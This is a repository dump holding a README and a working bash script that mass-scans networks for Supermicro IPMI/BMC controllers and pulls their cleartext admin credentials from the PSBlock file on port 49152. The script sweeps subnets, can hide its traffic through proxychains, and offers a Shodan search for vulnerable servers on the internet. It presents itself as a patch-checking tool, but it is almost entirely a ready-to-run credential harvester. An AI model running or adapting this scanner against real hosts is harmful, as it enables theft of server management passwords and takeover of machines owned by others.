├── README.md └── supermicro_scan.sh /README.md: -------------------------------------------------------------------------------- 1 | Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3 2 | https://crowdshield.com 3 | Usage: sh supermicro_scan.sh [proxy] 4 | 5 | ABOUT: 6 | Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to 7 | request the file PSBlock via port 49152. This plain text password file contains IPMI 8 | username and password information. This script allows users to scan their networks 9 | to check for vulnerable systems that require patching. 10 | 11 | USAGE: 12 | ./supermicro_scan.sh 74.200.8.237 - Single host scan 13 | ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy 14 | ./supermicro_scan.sh shodan - Search for vulnerable servers on ShodanHQ 15 | 16 | -------------------------------------------------------------------------------- /supermicro_scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Supermicro IPMI/BMC Cleartext Password Scanner v20140625 by 1N3 3 | # (c) https://crowdshield.com 4 | # Usage: sh supermicro_scan.sh [proxy] 5 | # 6 | # ABOUT: 7 | # Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to 8 | # request the file PSBlock via port 49152. This plain text password file contains IPMI 9 | # username and password information. This script allows users to scan their networks 10 | # to check for vulnerable systems that require patching. 
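#
# USAGE:
# ./supermicro_scan.sh 74.200.8.237 - Single host scan
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy
# ./supermicro_scan.sh shodan - Search for vulnerable servers on ShodanHQ
#
# OUTPUT HANDLING:
# A host that answers the PSBlock request has disclosed its BMC credentials
# in clear text. The reply is printed to stdout as received, so terminal
# scrollback and any redirected output hold live credentials. Accounts that
# appear in the output are exposed: update the BMC firmware and rotate those
# passwords. In proxy mode the same clear-text reply also crosses every hop
# of the proxychains chain.
#

#clear
echo "+ -- --=[https://crowdshield.com"
echo "+ -- --=[Supermicro IPMI Cleartext Password Scanner by 1N3"
echo ""

# `command -v` prints nothing when the tool is not on PATH.
UNICORNSCAN=$(command -v unicornscan)
CURL=$(command -v curl)
PROXYCHAINS=$(command -v proxychains)
TARGET=$1
PROXY=$2

if [ -z "$UNICORNSCAN" ]; then
  echo "+ -- --=[Unicornscan not installed! Exiting..."
  exit 1
fi

if [ -z "$PROXYCHAINS" ]; then
  # The message promises that the scan continues, so do not exit here;
  # drop the proxy request and let the scan run over a direct connection.
  echo "+ -- --=[Proxychains not installed! Continuing scan without proxy support..."
  PROXY=""
fi

if [ -z "$CURL" ]; then
  echo "+ -- --=[Curl not installed! Exiting..."
  exit 1
fi

if [ -z "$TARGET" ]; then
  echo "+ -- --=[Usage: $0 [proxy]"
  exit 1
fi

if [ "$TARGET" = "shodan" ]; then
  # SCAN USING SHODANHQ SEARCH
  echo "Searching ShowdanHQ..."
  # Quoted so the shell never treats the '?' in the URL as a glob character.
  iceweasel "http://www.shodanhq.com/search?q=Content-Length%3D3269" &
  exit
fi

# Request /PSBlock from one host on TCP 49152 and print the printable strings
# of the reply. $1 is the host address. stdin is redirected from /dev/null so
# the request cannot consume the host list that feeds the calling loop.
fetch_psblock() {
  if [ "$PROXY" = "proxy" ]; then
    proxychains curl "http://$1:49152/PSBlock" -m 3 --retry 1 -f -# < /dev/null | strings
  else
    curl "http://$1:49152/PSBlock" -m 3 --retry 1 -f -# < /dev/null | strings
  fi
}

if [ "$PROXY" = "proxy" ]; then
  # PROXY ENABLED
  echo "+ -- --=[Scanning via proxy..."
else
  # NO PROXY
  echo "+ -- --=[Scanning via direct connection..."
fi

# SCAN FOR THE DEFAULT FILES AND PORTS
# Field 5 of each unicornscan result line is taken to be the responding host
# (NOTE(review): confirm against the installed unicornscan's output format).
unicornscan -p 49152 "$TARGET" 2>/dev/null | awk '{print $5}' |
  while IFS= read -r host; do
    [ -n "$host" ] || continue
    echo "+ -- --=[Extracting User/Pass from $host"
    echo "+ -- --=[Sending GET http://$host:49152/PSBlock"
    fetch_psblock "$host"
  done

# Reached in both modes now that the scan branches no longer exit early.
echo ""
echo "+ -- --=[Scan Complete!"
exit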